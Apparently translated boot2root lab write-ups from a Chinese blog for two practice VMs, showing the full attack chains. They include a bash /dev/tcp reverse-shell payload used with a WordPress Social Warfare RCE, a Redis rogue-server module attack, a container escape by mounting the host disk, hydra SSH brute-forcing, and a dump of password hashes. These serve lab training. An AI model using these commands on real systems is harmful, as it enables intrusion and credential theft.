Inf0 - Boot2root practice (打靶)
https://dirtycow.cn/category/%E6%89%93%E9%9D%B6/
-
Group member's box: exchange
https://dirtycow.cn/349.html
2025-07-12T23:20:00+08:00
Web foothold
Target scan
┌──(root㉿kali)-[~]
└─# nmap -sS 192.168.1.39 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2025-07-12 01:46 EDT
Nmap scan report for 192.168.1.39
Host is up (0.00080s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:BD:44:E0 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.44 seconds
Ports 22 and 80 are open. The error page reveals ThinkPHP V5.0.5; its known RCE gives a shell directly.
Internal lateral movement
fscan -h 172.19.0.0/24 -np
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-07-12 14:17:09] [INFO] 暴力破解线程数: 1
[2025-07-12 14:17:09] [INFO] 开始信息扫描
[2025-07-12 14:17:09] [INFO] CIDR范围: 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 生成IP范围: 172.19.0.0.%!d(string=172.19.0.255) - %!s(MISSING).%!d(MISSING)
[2025-07-12 14:17:09] [INFO] 解析CIDR 172.19.0.0/24 -> IP范围 172.19.0.0-172.19.0.255
[2025-07-12 14:17:09] [INFO] 最终有效主机数量: 256
[2025-07-12 14:17:09] [INFO] 开始主机扫描
[2025-07-12 14:17:09] [INFO] 有效端口数量: 233
[2025-07-12 14:17:21] [SUCCESS] 端口开放 172.19.0.1:22
[2025-07-12 14:17:21] [SUCCESS] 服务识别 172.19.0.1:22 => [ssh] 版本:8.4p1 Debian 5+deb11u3 产品:OpenSSH 系统:Linux 信息:protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.4p1 Debian-5+deb11u3.]
[2025-07-12 14:17:45] [SUCCESS] 端口开放 172.19.0.3:80
[2025-07-12 14:17:50] [SUCCESS] 服务识别 172.19.0.3:80 => [http] 版本:1.18.0 产品:nginx
[2025-07-12 14:29:31] [SUCCESS] 端口开放 172.19.0.2:6379
[2025-07-12 14:29:36] [SUCCESS] 服务识别 172.19.0.2:6379 => [redis] 版本:5.0.14 产品:Redis key-value store
The fscan sweep of the internal network finds Redis on 172.19.0.2:6379. Upload frp and open a SOCKS proxy, then try connecting to Redis:
┌──(root㉿kali)-[~]
└─# proxychains4 -q redis-cli -h 172.19.0.2 -p 6379
172.19.0.2:6379> info
# Server
redis_version:5.0.14
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:82e99d45f54e2614
redis_mode:standalone
os:Linux 4.19.0-27-amd64 x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:10.2.1
process_id:1
run_id:e88d7ed01f6f98ec6aacd23601cf3eb1ab6cc8df
tcp_port:6379
uptime_in_seconds:1231
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:7500446
executable:/data/redis-server
config_file:
# Clients
connected_clients:1
client_recent_max_input_buffer:4
client_recent_max_output_buffer:4100800
blocked_clients:0
# Memory
used_memory:854176
used_memory_human:834.16K
used_memory_rss:12750848
used_memory_rss_human:12.16M
used_memory_peak:4953952
used_memory_peak_human:4.72M
used_memory_peak_perc:17.24%
used_memory_overhead:840974
used_memory_startup:791280
used_memory_dataset:13202
used_memory_dataset_perc:20.99%
allocator_allocated:1424312
allocator_active:1716224
allocator_resident:8458240
total_system_memory:2092433408
total_system_memory_human:1.95G
used_memory_lua:37888
used_memory_lua_human:37.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.20
allocator_frag_bytes:291912
allocator_rss_ratio:4.93
allocator_rss_bytes:6742016
rss_overhead_ratio:1.51
rss_overhead_bytes:4292608
mem_fragmentation_ratio:15.70
mem_fragmentation_bytes:11938672
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.1.0
active_defrag_running:0
lazyfree_pending_objects:0
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1752329680
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:0
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0
# Stats
total_connections_received:2
total_commands_processed:3
instantaneous_ops_per_sec:0
total_net_input_bytes:72
total_net_output_bytes:14801
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0
# Replication
role:master
connected_slaves:0
master_replid:20ebee4cf286daa409471774f86ee700d032f99f
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.697228
used_cpu_user:0.911468
used_cpu_sys_children:0.000000
used_cpu_user_children:0.001602
# Cluster
cluster_enabled:0
# Keyspace
Redis is unauthenticated, but none of the usual webshell-write and reverse-shell tricks work. After talking to bamuwe it turned out that the Redis host has no outbound access; the attacker's port can be mapped into the internal network, or an internal port mapped out. The web host has python3, so upload a minimal nc substitute:

import socket
import threading
import sys
import os

def recv_thread(conn):
    """Print everything the client sends until it disconnects."""
    try:
        while True:
            data = conn.recv(4096)
            if not data:
                print("\nConnection closed by client.")
                break
            print(data.decode(errors='ignore'), end='', flush=True)
    except Exception as e:
        print(f"\nReceive error: {e}")
    finally:
        conn.close()
        # sys.exit() in a non-main thread only ends that thread and the main
        # loop would stay blocked on stdin, so terminate the whole process.
        os._exit(0)

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <listen_port>")
        sys.exit(1)
    listen_port = int(sys.argv[1])
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow quick restarts
    server.bind(('0.0.0.0', listen_port))
    server.listen(1)
    print(f"Listening on 0.0.0.0:{listen_port} ...")
    conn, addr = server.accept()
    print(f"Connection from {addr[0]}:{addr[1]} established!")
    # Reader runs in the background; the main thread forwards stdin to the socket.
    t = threading.Thread(target=recv_thread, args=(conn,), daemon=True)
    t.start()
    try:
        while True:
            cmd = sys.stdin.readline()
            if not cmd:
                break
            conn.sendall(cmd.encode())
    except KeyboardInterrupt:
        print("\nUser interrupted.")
    finally:
        conn.close()
        server.close()

if __name__ == "__main__":
    main()
https://github.com/n0b0dyCN/redis-rogue-server
This tool does the whole job in one go. pspy on the web host shows what happens to the dropped module:
2025/07/12 10:59:33 CMD: UID=33 PID=760 | ./pspy64
2025/07/12 10:59:33 CMD: UID=33 PID=704 | /bin/bash
2025/07/12 10:59:33 CMD: UID=33 PID=703 | python3 -c import pty;pty.spawn('/bin/bash')
2025/07/12 10:59:33 CMD: UID=33 PID=697 | sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=693 | sh -c uname -a; w; id; sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=692 | md5sum
2025/07/12 10:59:33 CMD: UID=33 PID=472 | /bin/bash
2025/07/12 10:59:33 CMD: UID=33 PID=471 | python3 -c import pty;pty.spawn('/bin/bash')
2025/07/12 10:59:33 CMD: UID=33 PID=470 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=469 | sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=465 | sh -c uname -a; w; id; sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=403 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=32 | ./frpc -c frps.ini
2025/07/12 10:59:33 CMD: UID=33 PID=30 | /bin/bash
2025/07/12 10:59:33 CMD: UID=33 PID=29 | python3 -c import pty;pty.spawn('/bin/bash')
2025/07/12 10:59:33 CMD: UID=33 PID=28 | sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=24 | sh -c uname -a; w; id; sh -i
2025/07/12 10:59:33 CMD: UID=33 PID=15 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=14 | php-fpm: pool www
2025/07/12 10:59:33 CMD: UID=33 PID=9 | nginx: worker process
2025/07/12 10:59:33 CMD: UID=0 PID=8 | php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
2025/07/12 10:59:33 CMD: UID=0 PID=7 | nginx: master process /usr/sbin/nginx -g daemon off;
2025/07/12 10:59:33 CMD: UID=101 PID=6 | /usr/sbin/mariadbd
2025/07/12 10:59:33 CMD: UID=0 PID=1 | /usr/bin/python3 /usr/bin/supervisord -c /etc/supervisord.conf
2025/07/12 11:00:01 CMD: UID=0 PID=768 | runc init
2025/07/12 11:00:01 CMD: UID=0 PID=773 | rm -fv /var/www/html/exp.so
Note that the server periodically deletes files with a .so suffix; renaming exp.so to a file with no extension is enough.
www-data@0bb9bcb43160:/tmp$ python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
< python3 1.py --rhost 172.19.0.2 --lhost 172.19.0.3
______ _ _ ______ _____
| ___ \ | (_) | ___ \ / ___|
| |_/ /___ __| |_ ___ | |_/ /___ __ _ _ _ ___ \ `--. ___ _ ____ _____ _ __
| // _ \/ _` | / __| | // _ \ / _` | | | |/ _ \ `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \ __/ (_| | \__ \ | |\ \ (_) | (_| | |_| | __/ /\__/ / __/ | \ V / __/ |
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_| \_/ \___|_|
__/ |
|___/
@copyright n0b0dy @ r3kapig
[info] TARGET 172.19.0.2:6379
[info] SERVER 172.19.0.3:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: r
r
[info] Open reverse shell...
Reverse server address: 172.19.0.3
172.19.0.3
Reverse server port: 5555
5555
[info] Reverse shell payload sent.
[info] Check at 172.19.0.3:5555
[info] Unload module...
$ python3 s.py
Usage: s.py <listen_port>
$ python3 s.py 5555
id
Listening on 0.0.0.0:5555 ...
Connection from 172.19.0.2:56334 established!
uid=999(redis) gid=999(redis) groups=999(redis)
That gives a shell as the redis user.
cat /opt/user.txt
flag{user-4f6311d4cf5776f0316c2f1b6526a653}
Privilege escalation
Following bamuwe's hint, look at the database on the web host:
www-data@0bb9bcb43160:/tmp$ mysql -uroot -proot
mysql -uroot -proot
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 7
Server version: 10.5.29-MariaDB-0+deb11u1 Debian 11
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| hnymwl_com_utf8 |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.000 sec)
MariaDB [(none)]> use hnymwl_com_utf8;
use hnymwl_com_utf8;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [hnymwl_com_utf8]> show tables;
show tables;
+---------------------------+
| Tables_in_hnymwl_com_utf8 |
+---------------------------+
| codepay_order |
| codepay_user |
| sdad3135 |
| wp_allot |
| wp_area |
| wp_balance |
| wp_bankcard |
| wp_bankinfo |
| wp_banks |
| wp_cardinfo |
| wp_catproduct |
| wp_conf |
| wp_config |
| wp_gg |
| wp_integral |
| wp_klinedata |
| wp_newsclass |
| wp_newsinfo |
| wp_opentime |
| wp_order |
| wp_order_log |
| wp_payment |
| wp_price_log |
| wp_productclass |
| wp_productdata |
| wp_productinfo |
| wp_refundlog |
| wp_risk |
| wp_usercode |
| wp_userinfo |
| wp_webconfig |
| wp_wechat |
+---------------------------+
32 rows in set (0.001 sec)
MariaDB [hnymwl_com_utf8]> select * from wp_userinfo;
select * from wp_userinfo;
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| uid | username | upwd | utel | utime | agenttype | otype | ustatus | oid | address | portrait | lastlog | managername | comname | comqua | rebate | feerebate | usertype | wxtype | openid | nickname | logintime | usermoney | userpoint | minprice |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
| 1 | admin | 35a6b91de813873ca887f5d9b681d180 | | 1480061674 | 2 | 3 | 0 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | 0 | 0 | NULL | admin | NULL | 0.00 | NULL | NULL |
| 5632 | 10005632 | 18aed8d2a11896a6e76180b3d87e64bb | 123456 | 1592404993 | 0 | 0 | 0 | 1 | NULL | NULL | 1597391565 | admin | NULL | NULL | NULL | 0 | 0 | 0 | NULL | www | 1597391565 | 11670.00 | NULL | NULL |
| 5634 | 18888888888 | cf9c0c4996398526203b25d179b60aad | 18888888888 | 1592469112 | 0 | 0 | 0 | 666 | NULL | NULL | 1751965186 | AN | NULL | NULL | NULL | 0 | 0 | 0 | NULL | 小可爱 | 1751965186 | 680278.00 | NULL | NULL |
| 5635 | 10005635 | f9fb7dcf1f8af5b50235be3cbccf90ee | 19216813711 | 1752205841 | 0 | 0 | 0 | dashazi | NULL | NULL | 1752205841 | whatcanisay | NULL | NULL | NULL | 0 | 0 | 0 | NULL | root | 1752205841 | 0.00 | NULL | NULL |
| 5636 | 10005636 | cafc17ccad5b7523338f81ab912c2750 | 13333333333 | 1752296822 | 0 | 0 | 0 | 1 | NULL | NULL | 1752296822 | NULL | NULL | NULL | NULL | 0 | 0 | 0 | NULL | test | 1752296822 | 0.00 | NULL | NULL |
+------+-------------+----------------------------------+-------------+------------+-----------+-------+---------+---------+---------+----------+------------+-------------+---------+--------+--------+-----------+----------+--------+--------+-----------+------------+-----------+-----------+----------+
5 rows in set (0.000 sec)
MariaDB [hnymwl_com_utf8]>
The wp_userinfo table turns up a password entry for a user named root. Pull the web application code down for auditing and look at how passwords are hashed:

public function login()
{
    $userinfo = Db::name('userinfo');
    // Check whether already logged in
    if (isset($_SESSION['uid'])) {
        $this->redirect('index/index?token='.$this->token);
    }
    if(iswechat() && 1==2){
        // WeChat browser: WeChat login (dead code, 1==2 is always false)
        if(cookie('wx_info')){
            $wx_info = cookie('wx_info');
            $data['openid'] = $wx_info['openid'];
            $checkuser = Db::name('userinfo')->where($data)->value('uid');
            // Check whether already registered
            if($checkuser){ // Already registered: record the session directly
                $_SESSION['uid'] = $checkuser;
                // Update login time
                $t_data['logintime'] = $t_data['lastlog'] = time();
                $t_data['uid'] = $checkuser;
                $userinfo->update($t_data);
                $this->redirect('index/index');
            }else{ // Not registered: register, default password 123456
                $data['nickname'] = $wx_info['nickname'];
                $data['utime'] = time();
                //$data['upwd'] = md5('123456'.$data['utime']);
                $data['otype'] = 0;
                $data['ustatus'] = 0;
                $data['address'] = $wx_info['country'].$wx_info['province'].$wx_info['city'];
                $data['portrait'] = $wx_info['headimgurl'];
                if(isset($_SESSION['fid']) && $_SESSION['fid']>0){
                    $fid = $_SESSION['fid'];
                    $fid_info = $userinfo->where(array('uid'=>$fid,'otype'=>101))->value('uid');
                    if($fid_info){
                        $data['oid'] = $fid;
                    }
                }
                // Insert the record
                $ids = $userinfo->insertGetId($data);
                $newdata['uid'] = $ids;
                $newdata['username'] = 10000000+$ids;
                $newids = $userinfo->update($newdata);
                // Clear the cookie for safety
                cookie('wx_info', null);
                // Record the session
                $_SESSION['uid'] = $ids;
                // Update login time
                $t_data['logintime'] = $t_data['lastlog'] = time();
                $t_data['uid'] = $ids;
                $userinfo->update($t_data);
                $this->redirect('login/addpwd?token='.$this->token);
            }
        }else{
            $this->redirect('wechat/get_wx_userinfo');
        }
    }else{
        // Web user login request
        if(input('post.')){
            $data = input('post.');
            // Validate user input
            if(!isset($data['username']) || empty($data['username'])){
                return WPreturn('请输入用戶名!',-1);
            }
            if(!isset($data['upwd']) || empty($data['upwd'])){
                return WPreturn('请输入密碼!',-1);
            }
            // Look up the user
            $result = $userinfo
                ->where('username',$data['username'])->whereOr('nickname',$data['username'])->whereOr('utel',$data['username'])
                ->field("uid,upwd,username,utel,utime,otype,ustatus")->find();
            // Validate the user
            if(empty($result)){
                return WPreturn('登录失败,用戶名不存在!',-1);
            }else{
                if(!in_array($result['otype'], array(0,101))){ // Non-customers may not log in
                    return WPreturn('您无权登录!',-1);
                }
                // Password check: md5(plaintext . account creation timestamp)
                if($result['upwd'] == md5($data['upwd'].$result['utime'])){
                    if ($result['ustatus']==0)
                    {
                        $_SESSION['uid'] = $result['uid'];
                        // Update login time
                        $t_data['logintime'] = $t_data['lastlog'] = time();
                        $t_data['uid'] = $result['uid'];
                        $userinfo->update($t_data);
                        return WPreturn('登录成功!',1);
                    }elseif($result['ustatus']==1){
                        return WPreturn('登录失败,您的账户暂时被冻结!',-1);
                    }else{
                        return WPreturn('登录失败,用戶名不存在!',-1);
                    }
                }
                else{
                    return WPreturn('登录失败,密碼错误!',-1);
                }
            }
        }
        return $this->fetch();
    }
}

The password is stored as md5(pass + timestamp). You could write a brute-force script, but there is no need: the group chat hinted directly that the password is whatcanisay, the value in the managername column. Log in to the Redis host as root.

cat /proc/self/status | grep Cap
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
The bounding set is full, so this is probably a privileged container.
ls /dev/ | grep sda
sda
sda1
sda2
sda5
mount /dev/sda1 /mnt
cd /mnt
ls
bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
cd root
ls
root.txt
cat root.txt
flag{root-6dbfaf239023f6da6ed2ffc59d3bcea5}
Mounting sda1 reveals the host's own root filesystem: container escape successful.
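The password scheme in the audited login() above is upwd = md5(plaintext . utime), with the account's own creation timestamp as the only salt, stored in the same row. The following is an added example, not code from the writeup or from the application: it reproduces that check, shows what an exposure check of one row costs (one MD5 per guess, and the row's other columns are worth trying, since the dump had the password sitting in managername), and puts a PBKDF2 replacement beside it. The rows are constructed to mirror the wp_userinfo columns; no hash from the dump is used.

```python
import hashlib
import hmac
import os
from typing import Optional

def legacy_hash(password: str, utime: int) -> str:
    """The application's scheme: md5($data['upwd'] . $result['utime'])."""
    return hashlib.md5(f"{password}{utime}".encode()).hexdigest()

def legacy_verify(password: str, utime: int, stored: str) -> bool:
    """What login() does, but with a constant-time comparison instead of ==."""
    return hmac.compare_digest(legacy_hash(password, utime), stored)

def check_row(row: dict, candidates) -> Optional[str]:
    """Return the first candidate matching a wp_userinfo-style row, or None.

    The salt (utime) sits in the row next to the hash, so each guess costs
    exactly one MD5; that is why a wordlist run against this table is cheap."""
    for pw in candidates:
        if legacy_hash(pw, row["utime"]) == row["upwd"]:
            return pw
    return None

def strong_hash(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Hardened replacement: PBKDF2-HMAC-SHA256, random 16-byte salt, high work factor."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def strong_verify(password: str, stored: str) -> bool:
    """Verify against the self-describing string produced by strong_hash()."""
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)

# Constructed sample rows with the columns the dump shows (uid, username, upwd,
# utime, managername); the hashes are generated here, not taken from the table.
SAMPLE_ROWS = [
    {"uid": 5635, "username": "10005635", "utime": 1752205841,
     "managername": "whatcanisay", "upwd": legacy_hash("whatcanisay", 1752205841)},
    {"uid": 5636, "username": "10005636", "utime": 1752296822,
     "managername": None, "upwd": legacy_hash("correct horse battery", 1752296822)},
]

def audit_rows(rows, wordlist) -> dict:
    """uid -> recovered password (or None) for every row.

    Besides the wordlist, every other string column of the row is tried,
    because operators reuse values across columns (managername here)."""
    out = {}
    for r in rows:
        row_values = [v for k, v in r.items() if isinstance(v, str) and k != "upwd"]
        out[r["uid"]] = check_row(r, list(wordlist) + row_values)
    return out

if __name__ == "__main__":
    print(audit_rows(SAMPLE_ROWS, ["123456", "password"]))
    h = strong_hash("whatcanisay")
    print(h[:40] + "...", strong_verify("whatcanisay", h))
```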
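The privileged-container guess above rests on the CapBnd value from /proc/self/status. Added example, not from the writeup: decode the Cap* bitmasks into capability names and judge the container from the bounding set (CapEff is empty for the non-root redis user and says nothing about what root inside the container could do). Capability names follow the kernel's capability.h; the Docker default bounding-set constant and the 4.19 last-cap value of 37 are assumptions stated in the comments.

```python
from typing import Dict, List

# Capability names by bit index, after include/uapi/linux/capability.h. Kernel 4.19
# (the host in the writeup) defines 0..37; 38..40 were added in later kernels.
CAP_NAMES = [
    "chown", "dac_override", "dac_read_search", "fowner", "fsetid", "kill",
    "setgid", "setuid", "setpcap", "linux_immutable", "net_bind_service",
    "net_broadcast", "net_admin", "net_raw", "ipc_lock", "ipc_owner",
    "sys_module", "sys_rawio", "sys_chroot", "sys_ptrace", "sys_pacct",
    "sys_admin", "sys_boot", "sys_nice", "sys_resource", "sys_time",
    "sys_tty_config", "mknod", "lease", "audit_write", "audit_control",
    "setfcap", "mac_override", "mac_admin", "syslog", "wake_alarm",
    "block_suspend", "audit_read", "perfmon", "bpf", "checkpoint_restore",
]

# Bounding set Docker gives an unprivileged container by default (14 capabilities).
DOCKER_DEFAULT_BND = 0x00000000A80425FB

# Capabilities whose presence in the bounding set lets root inside the container
# reach the host (mount devices, load modules, ptrace, raw I/O, ...).
HOST_REACHING = {"cap_sys_admin", "cap_sys_module", "cap_sys_rawio",
                 "cap_sys_ptrace", "cap_dac_read_search", "cap_net_admin"}

def decode_caps(hexmask: str) -> List[str]:
    """Turn a CapXxx hex value into cap_* names (unknown bits become cap_<index>)."""
    mask = int(hexmask, 16)
    names = []
    for i in range(mask.bit_length()):
        if mask >> i & 1:
            names.append(f"cap_{CAP_NAMES[i]}" if i < len(CAP_NAMES) else f"cap_{i}")
    return names

def parse_status(text: str) -> Dict[str, int]:
    """Pick the Cap* lines out of /proc/<pid>/status."""
    caps = {}
    for line in text.splitlines():
        if line.startswith("Cap") and ":" in line:
            key, value = line.split(":", 1)
            caps[key.strip()] = int(value.strip(), 16)
    return caps

def assess(caps: Dict[str, int], last_cap: int = 37) -> dict:
    """Judge the container from the bounding set, not the effective set.

    CapBnd caps every process in the container, including root; a bounding
    set holding every capability the kernel knows is the mark of --privileged."""
    full = (1 << (last_cap + 1)) - 1
    bnd = caps.get("CapBnd", 0)
    bnd_names = set(decode_caps(hex(bnd)))
    return {
        "bounding_is_full": bnd & full == full,
        "bounding_is_docker_default": bnd == DOCKER_DEFAULT_BND,
        "host_reaching_in_bounding": sorted(bnd_names & HOST_REACHING),
        "effective": decode_caps(hex(caps.get("CapEff", 0))),
    }

def read_last_cap(default: int = 37) -> int:
    """Highest capability the running kernel knows (/proc/sys/kernel/cap_last_cap)."""
    try:
        with open("/proc/sys/kernel/cap_last_cap") as f:
            return int(f.read().strip())
    except OSError:
        return default

# The five lines from the writeup's `cat /proc/self/status | grep Cap`.
SAMPLE_STATUS = """CapInh:\t0000000000000000
CapPrm:\t0000000000000000
CapEff:\t0000000000000000
CapBnd:\t0000003fffffffff
CapAmb:\t0000000000000000
"""

if __name__ == "__main__":
    verdict = assess(parse_status(SAMPLE_STATUS), last_cap=37)
    for k, v in verdict.items():
        print(f"{k}: {v}")
    # On a live box: assess(parse_status(open('/proc/1/status').read()), read_last_cap())
```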
-
Group member's box: New
https://dirtycow.cn/345.html
2025-07-02T20:00:00+08:00
Web foothold
The site is WordPress. Clicking around redirects to http://new.dsz, so add a hosts entry. For WordPress the usual routine applies: run wpscan to enumerate users and brute-force passwords first, which yields nothing. The site uses the Social Warfare v3.5.2 plugin, and a quick search finds an RCE: https://github.com/hash3liZer/CVE-2019-9978
┌──(root㉿kali)-[~]
└─# cat payload
<pre>system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.37/4444 0>&1'")</pre>
┌──(root㉿kali)-[~]
└─# python2 wp.py -t http://new.dsz --payload-uri http://192.168.1.37/payload
[>] Sending Payload to System!
┌──(root㉿kali)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.1.37] from (UNKNOWN) [192.168.1.36] 33860
bash: cannot set terminal process group (430): Inappropriate ioctl for device
bash: no job control in this shell
www-data@New:/var/www/new.dsz/wp-admin$
Shell obtained.
Privilege escalation
www-data@New:/home$ cd /opt
cd /opt
www-data@New:/opt$ ls
ls
andeli_cred
www-data@New:/opt$
/opt contains an executable, andeli_cred, which prints a pile of MD5-looking strings when run. Try those strings as passwords for the andeli user:
┌──(root㉿kali)-[~]
└─# hydra -l andeli -P 1 ssh://192.168.1.36 -vV -f -t 10
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-07-01 20:26:03
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10001 login tries (l:1/p:10001), ~1001 tries per task
[DATA] attacking ssh://192.168.1.36:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://andeli@192.168.1.36:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.36:22
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "固定MD5插入位置: 665" - 1 of 10001 [child 0] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "eea0353df30b9b38f5f280db88912f91" - 2 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "e31195e88f31a699c9c499f129248b56" - 3 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "f788c604535faf9685a1ea30355b1a20" - 4 of 10001 [child 3] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1a8d0816b7556ebe36f2022387e92093" - 5 of 10001 [child 4] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "a11b921496af55d8bdabfde74d06d9a8" - 6 of 10001 [child 5] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "ab33d487a26f748312e0fd84a8a724fc" - 7 of 10001 [child 6] (0/0)
............................
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5cca227ce87f76ad1728abcfbb0dd792" - 658 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "35d57416c953f0007381e409006d700a" - 659 of 10001 [child 1] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "5dfd113da80981a0421272c7224a2448" - 660 of 10001 [child 6] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "145258ff008912955a7cc33f6798cd0d" - 661 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "1506df5efe700055ad170466cff8cf5e" - 662 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "55425a0487587ae27f984fe0ed8add82" - 663 of 10001 [child 9] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "3d4875cfc174c5635fb9ea9c7164ef61" - 664 of 10001 [child 2] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "cb93062c7903f67452d3c6f476855f71" - 665 of 10001 [child 7] (0/0)
[ATTEMPT] target 192.168.1.36 - login "andeli" - pass "9eeb22195b4eb7a35bcad0f45761eb7b" - 666 of 10001 [child 9] (0/0)
[22][ssh] host: 192.168.1.36 login: andeli password: 9eeb22195b4eb7a35bcad0f45761eb7b
Log in over SSH and run the standard checks. Looking for SUID binaries finds nothing usable, so check sudo -l:
andeli@New:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
